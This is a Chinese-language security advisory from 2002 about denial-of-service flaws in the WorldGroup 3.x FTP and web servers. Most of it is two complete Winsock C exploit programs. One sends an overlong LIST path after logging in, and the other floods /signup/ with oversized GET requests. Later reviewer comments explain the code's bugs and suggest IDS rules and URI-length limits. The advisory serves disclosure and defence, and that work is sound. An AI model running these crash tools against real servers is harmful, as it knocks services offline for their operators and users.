WorldGroup 3.0 FTP和WEB存在拒绝服务攻击发布时间:2002-02-28
更新时间:2002-02-28
严重程度:中
威胁程度:远程拒绝服务
错误类型:边界检查错误
利用方式:服务器模式
受影响系统
WorldGroup 3.x详细描述
WorldGroup 3.x 的FTP和WEB服务程序存在拒绝服务攻击,FTP在接收到多于105个 "/"字符后会产生服务停止响应,而WEB服务在接收到超长的GET请求时会导致拒绝 服务攻击:GET /signup/a.[aaaaaaaa....aaaa] 。
测试代码
----------------- BEGIN FTP_DOS.C ---------------------
/*
by Limpid Byte project
http://lbyte.void.ru
lbyte@host.sk
[Worldgroup FTP Server Denial of Service]
More than 105 "/" in LIST command.
*/
/*
 * Reviewer annotations (comments only; the code below is unchanged).
 *
 * What the listing does: a Winsock console program that connects to TCP
 * port 21 of argv[1], sends USER argv[2] and PASS argv[3], then PASV, then
 * a single LIST command whose argument is a long run of repeated
 * wildcard and parent-directory path segments. After each command it reads
 * one reply into cgiBuff and echoes the command and the reply.
 *
 * Defensive reading: per the advisory text, the WorldGroup 3.x FTP service
 * stops responding after receiving more than 105 "/" characters. The
 * program never opens the data connection that PASV announces, so as far
 * as this listing shows the condition is reached on the control channel
 * alone, after a successful login (the usage example logs in as
 * anonymous). An FTP-aware filter or IDS rule can therefore key on LIST
 * arguments with an abnormal number of path separators. The advisory lists
 * no fix, so exposure is presumably reduced by restricting who can reach
 * the FTP port and by disabling anonymous login -- confirm against current
 * vendor guidance.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>
/* Not referenced anywhere in this program. */
#define FOUND "220"
int main(int argc, char *argv[])
{
    int sock;
    struct sockaddr_in blah;
    struct hostent *he;
    char cgiBuff[1024];
    char *cgiPage[6];
    WSADATA wsaData;
    char cr[] = "\n";
    /*
     * NOTE(review): the usage text names three arguments (argv[1..3]) but
     * only argc < 3 is rejected here; with exactly two arguments argv[3] is
     * NULL and the later strlen(cgiPage[3]) is undefined behaviour.
     */
    if (argc < 3) {
        printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThis program crash Worldgroup servers 3.xx for windows 95/98/ME/NT/2K.");
        printf("\n\rGreets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\n\r USAGE:\n\r");
        printf("Ftp_dos.exe [HOST] [LOGIN] [PASSWORD] ");
        printf("\n\r example : fpt_dos.exe 127.0.0.1 anonymous anonymous@127.0.0.1 \n");
        exit(1);
    }
    /* FTP command sequence: slots 1 and 3 carry the caller-supplied login and password. */
    cgiPage[0] = "USER ";
    cgiPage[1] = (argv[2]);
    cgiPage[2] = "PASS ";
    cgiPage[3] = (argv[3]);
    cgiPage[4] = "PASV";
    /* The LIST argument is the input the advisory describes; it is the only non-routine command sent. */
    cgiPage[5] = "LIST */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../\n";
    /* 0x101 requests Winsock version 1.1. */
    if(WSAStartup(0x101,&wsaData)) {
        printf("Unable to initialize WinSock lib.\n");
        exit(1);
    }
    printf("Let's crash the World!\n\r");
    printf("Coded by the [eaSt]:\n\r");
    printf("\nConnecting %s on port 21...\n\n", argv[1]);
    /* NOTE(review): the socket() result is not checked before use. */
    sock = socket(AF_INET,SOCK_STREAM,0);
    blah.sin_family=AF_INET;
    blah.sin_addr.s_addr=inet_addr(argv[1]);
    blah.sin_port=htons(21);
    /* A successful name lookup overrides the inet_addr() value set above. */
    if ((he = gethostbyname(argv[1])) != NULL) {
        memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length);
    }
    else {
        if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE) {
            WSACleanup();
            exit(1);
        }
    }
    if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0) {
        WSACleanup();
        exit(1);
    }
    /*
     * Read the server greeting.
     * NOTE(review): here and at every later recv(), the return value is
     * used directly as an array index; a failed recv() returns a negative
     * value, which would write outside cgiBuff.
     */
    memset(cgiBuff, 0, sizeof(cgiBuff));
    cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
    printf("<< %s", cgiBuff);
    /* USER <login>; send() return values are ignored throughout. */
    send(sock,cgiPage[0],strlen(cgiPage[0]),0);
    send(sock,cgiPage[1],strlen(cgiPage[1]),0);
    send(sock,cr,1,0);
    memset(cgiBuff, 0, sizeof(cgiBuff));
    cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
    printf(">> %s %s\n<< %s", cgiPage[0], cgiPage[1], cgiBuff);
    /* PASS <password>; the printf below echoes the password to the console. */
    send(sock,cgiPage[2],strlen(cgiPage[2]),0);
    send(sock,cgiPage[3],strlen(cgiPage[3]),0);
    send(sock,cr,1,0);
    memset(cgiBuff, 0, sizeof(cgiBuff));
    cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
    printf(">> %s %s\n<< %s", cgiPage[2], cgiPage[3], cgiBuff);
    /* PASV; the reply is printed but the announced data port is never connected to. */
    send(sock,cgiPage[4],strlen(cgiPage[4]),0);
    send(sock,cr,1,0);
    memset(cgiBuff, 0, sizeof(cgiBuff));
    cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
    printf(">> %s\n<< %s", cgiPage[4], cgiBuff);
    /* LIST with the long path argument, followed by one more read of the control channel. */
    send(sock,cgiPage[5],strlen(cgiPage[5]),0);
    send(sock,cr,1,0);
    memset(cgiBuff, 0, sizeof(cgiBuff));
    cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
    printf(">> %s\n<< %s", cgiPage[5], cgiBuff);
    /*
     * This message is printed unconditionally; the program does not itself
     * verify whether the server stopped responding. sock is never passed to
     * closesocket() in this listing.
     */
    printf("Try reconnect to %s\n", argv[1]);
    WSACleanup();
    return 0;
}
----------------- END FTP_DOS.C ---------------------
----------------- BEGIN WWW_DOS.C ---------------------
/*
by Limpid Byte project
http://lbyte.void.ru
lbyte@host.sk
Worldgroup Server Denial of Service for Windows 9x/ME only.
Error between system fuction windows and worldgroup from web interface.
REGUEST: GET /signup/a.[aaaaaaaa....aaaa] */
/*
 * Reviewer annotations (comments only; the code below is unchanged).
 *
 * What the listing does: a Winsock console program that opens 94
 * successive connections to TCP port 80 of argv[1]. Each connection sends
 * one HTTP/1.0 GET for a path under /signup/ whose file name is a run of
 * 'a' characters, 219 long on the first pass and one longer on each later
 * pass, followed by a fixed ".txt?=..." suffix. It then reads one reply and
 * prints a verdict.
 *
 * Defensive reading: per the advisory text, the WorldGroup 3.x web service
 * is denied service by an over-long GET request; the author's header limits
 * this to Windows 9x/ME hosts. The observable is a burst of requests to
 * /signup/ with a path component of well over 200 characters, so a URI
 * length limit at a fronting proxy or an IDS rule on that path length is
 * the natural control -- the advisory itself lists no fix.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>
/* Substring looked for in the first 32 bytes of each HTTP reply. */
#define FOUND "200"
int main(int argc, char *argv[])
{
    int sock, count;
    struct sockaddr_in blah;
    struct hostent *he;
    char cgiBuff[1024];
    WSADATA wsaData;
    /* Only the host argument is required. */
    if (argc < 2) {
        printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThis program crash Worldgroup servers 3.20 for windows 95/98/ME.\n");
        printf("Greets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\n\n");
        printf(" USAGE : www_dos.exe [HOST] \n");
        printf(" example : www_dos.exe 127.0.0.1 \n");
        exit(1);
    }
    /* 0x101 requests Winsock version 1.1. */
    if(WSAStartup(0x101,&wsaData)) {
        printf("Unable to initialize WinSock lib.\n");
        exit(1);
    }
    printf("Let's crash the World!\n");
    printf("Coded by the [eaSt]:\n");
    printf("\nScanning %s on port 80...\n\n", argv[1]);
    /* One new TCP connection per iteration; the name is resolved again every time. */
    for (count = 0; count < 94; count++) {
        /* NOTE(review): the socket() result is not checked before use. */
        sock = socket(AF_INET,SOCK_STREAM,0);
        blah.sin_family=AF_INET;
        blah.sin_addr.s_addr=inet_addr(argv[1]);
        blah.sin_port=htons(80);
        /* A successful name lookup overrides the inet_addr() value set above. */
        if ((he = gethostbyname(argv[1])) != NULL) {
            memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length);
        }
        else {
            if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE) {
                WSACleanup();
                exit(1);
            }
        }
        /* A failed connect ends the whole run; the socket is not closed on this path. */
        if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0) {
            WSACleanup();
            exit(1);
        }
        /*
         * Build the request in place: the 12-byte "GET /signup/" prefix,
         * then 219 + count filler bytes, then the suffix written at the
         * matching offset. The largest offset (12 + 219 + 93) plus the
         * suffix stays inside the 1024-byte buffer. The request ends with
         * bare "\n\n" rather than CRLF pairs.
         */
        memset(cgiBuff, 0, sizeof(cgiBuff));
        sprintf(cgiBuff, "GET /signup/");
        memset(cgiBuff + 12, 'a', 219 + count);
        sprintf(cgiBuff + 12 + 219 + count, ".txt?=../test.txt HTTP/1.0\n\n");
        /* NOTE(review): %d is given a size_t from strlen(); the specifier does not match. */
        printf("Sending: %d symbols request\n", strlen(cgiBuff));
        send(sock,cgiBuff,strlen(cgiBuff),0);
        memset(cgiBuff, 0, sizeof(cgiBuff));
        /*
         * Only a recv() result of 0 (orderly close with no data) is reported
         * as "Crashed"; a negative error return is non-zero and falls into
         * the else branch, so the printed verdict is not a reliable health
         * signal for the server.
         */
        if(!recv(sock,cgiBuff,sizeof(cgiBuff),0)) {
            printf("Crashed\n");
        }
        else {
            /* Keep only the first 32 bytes of the reply before searching for FOUND. */
            cgiBuff[32] = 0;
            if (strstr(cgiBuff,FOUND)) {
                printf("Send (%s)\n", cgiBuff);
            }
            else {
                printf("Not Found (%s)\n", cgiBuff);
            }
        }
        closesocket(sock);
    }
    /* Printed unconditionally after the loop, whatever the replies were. */
    printf("Try reconnect to %s\n", argv[1]);
    WSACleanup();
    return 0;
}
----------------- END WWW_DOS.C ---------------------
解决方案
尚无
相关信息
3APA3A (3APA3A@SECURITY.NNOV.RU)
参考:http://lbyte.void.ru/
相关主页:http://www.gcomm.com/